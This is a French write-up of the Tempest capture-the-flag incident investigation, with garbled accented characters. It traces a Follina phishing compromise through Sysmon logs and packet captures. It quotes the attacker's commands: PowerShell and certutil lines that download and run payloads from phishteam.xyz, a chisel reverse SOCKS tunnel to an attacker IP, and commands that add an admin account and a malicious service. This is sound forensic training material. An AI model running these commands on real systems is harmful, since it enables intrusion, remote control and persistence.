đ Ătude de Cas : Tempest â Investigation dâune Intrusion par Phishing avec Sysmon et PowerShell
Le challenge Tempest a simulé une attaque de phishing qui a conduit à une compromission complÚte du systÚme via un document Microsoft Word malveillant.
Cette Ă©tude de cas se concentre sur lâanalyse des journaux dâĂ©vĂ©nements, la forensique PowerShell et la corrĂ©lation des donnĂ©es Sysmon pour reconstruire les Ă©tapes de lâattaquant â depuis le vecteur dâinfection initial jusquâĂ lâescalade de privilĂšges et la persistance.
Introduction et Configuration de lâEnvironnement
Jâai commencĂ© par me connecter Ă la machine virtuelle Windows dâinvestigation et examiner les fichiers Sysmon, Windows et PCAP situĂ©s dans le rĂ©pertoire Incident Files.
LâenquĂȘte visait Ă dĂ©terminer comment lâutilisateur benimaru sur lâhĂŽte TEMPEST a Ă©tĂ© compromis aprĂšs avoir ouvert une piĂšce jointe suspecte.
Pour prĂ©parer lâinvestigation, jâai listĂ© tous les fichiers et gĂ©nĂ©rĂ© leurs hash SHA256 avec PowerShell :
powershell $Files = Get-ChildItem âC:\Users\user\Desktop\Incident Filesâ ForEach($File in $Files) { Get-FileHash $File -Algorithm SHA256 }
Fichiers de preuve principaux :
- capture.pcapng
- sysmon.evtx
- windows.evtx

Identification du Document Malveillant
En analysant les journaux Sysmon, jâai recherchĂ© les entrĂ©es contenant des rĂ©fĂ©rences .doc et dĂ©couvert un document suspect nommĂ© free_magicules.doc. Une analyse plus approfondie a rĂ©vĂ©lĂ© que ce fichier provenait dâun domaine de phishing : http://phishteam.xyz/02dcf07/free_magicules.doc Les journaux Sysmon ont Ă©galement montrĂ© lâutilisateur et lâhĂŽte compromis : Utilisateur : benimaru Machine : TEMPEST Le document malveillant a Ă©tĂ© ouvert par Microsoft Word (PID 496), ce qui a dĂ©clenchĂ© une chaĂźne dâexĂ©cution PowerShell et MSDT â un indicateur clĂ© dâexploitation.
DĂ©couverte de lâExploit et ExĂ©cution du Payload
Dans les journaux Sysmon, jâai trouvĂ© une commande PowerShell encodĂ©e dĂ©clenchĂ©e via lâutilitaire MSDT :
- C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force ⊠Décodage du payload Base64 :
- $app=[Environment]::GetFolderPath(âApplicationDataâ);
- cd â$app\Microsoft\Windows\Start Menu\Programs\Startupâ;
- iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip;
- Expand-Archive .\update.zip -DestinationPath .;
- rm update.zip; Cela confirme que le payload a tĂ©lĂ©chargĂ© et extrait des fichiers supplĂ©mentaires dans le dossier Startup pour assurer la persistance. Lâattaque exploitait la vulnĂ©rabilitĂ© MSDT (Follina) â CVE-2022-30190, permettant lâexĂ©cution de code Ă distance sans macros.
Persistance et Payloads Secondaires
Le payload extrait a créé un raccourci malveillant Ă lâemplacement suivant :
- C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk Ă la connexion de lâutilisateur, il exĂ©cutait la commande PowerShell suivante pour tĂ©lĂ©charger et exĂ©cuter first.exe:
- âC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeâ -w hidden -noni certutil -urlcache -split -f âhttp://phishteam.xyz/02dcf07/first.exeâ C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe Hash SHA256 de first.exe :
- CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8 Les événements réseau Sysmon ont montré que first.exe établissait des connexions sortantes vers :
- resolvecyber.xyz:80 indiquant un canal de Command & Control (C2) secondaire.

Analyse Réseau et Comportement C2
Avec Wireshark, jâai filtrĂ© le trafic HTTP entre lâIP victime (192.168.254.107) et les IP attaquants (167.71.199.191 / 167.71.222.162). Le trafic capturĂ© montrait des requĂȘtes HTTP encodĂ©es en Base64 vers :
- http://phishteam.xyz/02dcf07/index.html Le binaire utilisait le paramÚtre q pour envoyer les résultats encodés et récupérer de nouvelles commandes via /9ab62b5? en GET. Le header User-Agent indiquait que le payload était écrit en Nim.

Découverte des Identifiants et Proxy SOCKS
Ă partir du trafic dĂ©codĂ©, lâattaquant a exfiltrĂ© des identifiants trouvĂ©s dans un script PowerShell :
- Utilisateur : TEMPEST\benimaru
- Mot de passe : infernotempest Il a utilisĂ© ces informations pour explorer les connexions actives et les ports ouverts, notamment le port 5985 (WinRM) pour un accĂšs shell distant. Pour maintenir lâaccĂšs, un proxy SOCKS inversĂ© a Ă©tĂ© dĂ©ployĂ© avec ch.exe :
- C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks Hash du binaire :
- 8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451
Outil identifié : chisel

Escalade de PrivilĂšges et Persistance
AprĂšs mouvement latĂ©ral, lâattaquant a tĂ©lĂ©chargĂ© spf.exe (hash 8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D) â identifiĂ© comme PrintSpoofer. Il a exploitĂ© la SeImpersonatePrivilege pour obtenir les privilĂšges SYSTEM. Ensuite, il a exĂ©cutĂ© final.exe, qui a reconnectĂ© le C2 sur le port 8080.
Création de Comptes et Mécanismes de Persistance
AprÚs avoir obtenu les privilÚges SYSTEM, deux nouveaux comptes utilisateurs ont été créés :
- shion, shuna Commandes exécutées :
- net user shion /add
- net user shuna /add
- net localgroup administrators /add shion ĂvĂ©nements pertinents :
- 4720 â CrĂ©ation dâun compte utilisateur
- 4732 â Ajout Ă un groupe administrateur local
La persistance a été finalisée via un service malveillant :
C:\Windows\system32\sc.exe \TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto

Leçons Apprises
Le challenge Tempest a fourni une expĂ©rience complĂšte dâinvestigation SOC, couvrant :
- CorrĂ©lation dâĂ©vĂ©nements avec Sysmon et PowerShell
- Identification de la livraison par phishing et de lâexĂ©cution de code Ă distance (CVE-2022-30190)
- Compréhension de la persistance via raccourcis de démarrage et services malveillants
- Suivi des communications C2 et de lâescalade de privilĂšges (PrintSpoofer)
- Identification des TTP de lâattaquant selon le MITRE ATT&CK :
- Exécution (T1203)
- Persistance (T1547)
- Escalade de privilĂšges (T1068)
- Ăvasion des dĂ©fenses (T1070)
- Conclusion : cette enquĂȘte a renforcĂ© ma capacitĂ© Ă analyser des intrusions rĂ©elles, extraire des IOCs exploitables et construire des workflows structurĂ©s de rĂ©ponse aux incidents en utilisant la tĂ©lĂ©mĂ©trie native Windows et les captures rĂ©seau.